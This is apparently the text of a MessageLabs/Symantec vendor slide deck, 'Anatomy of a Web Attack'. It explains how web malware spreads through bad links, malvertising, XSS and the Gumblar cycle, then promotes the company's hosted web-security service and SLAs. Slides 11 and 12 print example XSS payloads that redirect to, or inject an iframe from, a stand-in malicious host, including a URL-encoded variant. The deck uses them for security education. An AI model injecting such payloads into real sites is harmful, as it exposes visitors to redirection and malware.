This document discusses common web attacks that companies face and how to protect against them. It outlines how malware spreads through bad links, advertising, and cross-site scripting (XSS) attacks. XSS can be used to redirect users to malicious sites or install malware through iframes. Up to 60% of malicious web traffic involves "Gumblar" attacks, which install malware to steal user credentials and data. The document recommends controlling web access through policy, monitoring usage, and using malware protection and a hosted security service for the best protection. It highlights the services, infrastructure, service level agreements and shared intelligence of MessageLabs to protect against web threats.

1. Anatomy of a Web Attack1

2. AgendaChallenges Corporation Face Web Usage StatisticsWeb AttacksSolving the ProblemMessageLabs Services

3. The ChallengeThe Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats: Productivity Offensive Materials Abuse of resources Malware

4. Lots of websitesAverage 2,465 new malware websites per day.

5. Why malware?Monetize the attack.Install my software – botnet - spam / DDOS

6. Steal your credentials - bank theft / fraud

7. Steal your data – confidential data / fraudHow do you get it?Bad LinksAdvertisingXSSGumblarServices 6

8. Getting Web MalwareBad Linkpostcard.jpg.exe

9. Advertise ItSubvert a legitimate websiteAdverts

10. Fake AV Advert

11. XSS AttackUser contentNo. Your wrong.Duh! Its “you’re”.I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>

12. XSS IFrame Attackhttp://genuine/index.php?search="'><iframe src="http://malicious“ height=“100%" width=“100%"></iframe>http://genuine/index.php?search="'>%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%61%6C%69%63%69%6F%75%73%201C%20%0A%68%65%69%67%68%74%3D%201C%31%30%30%25%22%20%77%69%64%74%68%3D%201C%31%30%30%25%22%3E%0A%3C%2F%69%66%72%61%6D%65%3E%0A

13. Web MalwareMalwareMalicious instructionsBrowser / JS / Flash / PDFComplete controlVictimBad Guy

14. Gumblar LifecycleUser visits website with XSS exploitUser is forwarded to host serving malwareMalware installed (often flash or PDF)Malware steals website logins, forwards to hackerHacker logs into website, installs XSS exploit

15. Gumblar PrevalanceUp to 60% of all malicious web traffic is Gumblar.

16. How You Can Protect Yourself15

17. Controlling the webIT Management should first consider controlling the Web;Policy engine includes:Categorised URL databaseMIME and file type lists Time periodsUser and group based policiesCustomizable block messagesControls HTTP and HTTPS

18. Building the policyNo access to travel, leisure and sport between 9am and 5pmNo access to sex, guns or drugsNo access to streaming audio and video (reduce bandwidth)Only support can download executables

19. Monitoring accessDashboard – 1 year of high level informationDetailed reports up to 6 months of URL and Malware informationCustomizable reports in PDF formatScheduled reports sent directly to your inbox

20. Malware ProtectionScans HTTP and FTP/HTTP trafficMultiple signature based AV enginesSkeptic technologyCustomizable block messagesConverged analysisNo noticeable latency

21. You have choices for Web Security20

22. Why use a hosted services over hardware or software?

23. Why use MessageLabs Services?Best Client and Technical Support Global Support is 24/7/365 & included with the serviceSupport SLA protects your businessAlways get a live person who speaks your languageDedicated CSM teamBest ServicesAwarding WinningAnalyst approvedBacked by strongest SLAs

24. Most Robust Global InfrastructureIncorporating 14 data centers spanning four continentsEvery data center is scalable and secured to the highest standardsClustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated23

25. Best Service Level AgreementsWebAnti-Virus Protection  100% protection from known and unknown email virusesCredit is offered if a client infected by a virusAnti-Virus Protection  100% protection against known virusesCredit is offered if a client infected by a virusEmailArchivingLatency  Average scanning time of 100% of web content is within 100 millisecondsCredit is offered if latency exceeds 100 millisecondsVirus False Positives  0.0001% FP capture rateCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)Credit is offered if we do not meet this commitmentSupportService Availability Guarantee 99.9% uptime for archiving networkClient may terminate if availability falls below 90%Spam False Positives  0.0003% FP capture rateCredit is offered if we do not meet this commitmentAppliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no costLatency  Average roundtrip time of 100% of email delivered in less than 60 secondsCredit is offered if latency exceeds 1 minuteDelivery  100% delivery guaranteeClient may terminate if we do not meet thisTechnical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrsCredit is offered if we do not meet this commitmentService Availability  100% uptimeCredit is offered if availability falls below 100%Client may terminate if availability falls below 95%

26. Best Shared IntelligenceAccuracy, Reliability & PerformanceThe automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.

27. Q&AVisit: www.MessageLabs.comPhone: 866.460.0000Email: Lrothman@MessageLabs.com26

28. Special Thanks27Martin Lee MIET CISSPResearch & Response TeamSymantec Hosted Services